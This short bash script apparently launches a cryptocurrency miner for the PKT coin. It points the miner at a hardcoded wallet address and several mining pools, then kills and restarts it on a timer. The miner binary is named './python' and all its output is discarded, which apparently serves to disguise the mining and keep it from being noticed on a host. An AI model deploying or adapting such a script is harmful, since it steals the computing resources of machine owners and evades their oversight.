#!/bin/bash
sleep 120
while true; do
nohup ./python ann -t 1 -p pkt1q5saxdy2crusqpevt6xcmcxc780xjz2kzha846n http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://pool.srizbi.com > /dev/null 2>&1 &
sleep 90m
pkill python
sleep 6m
done

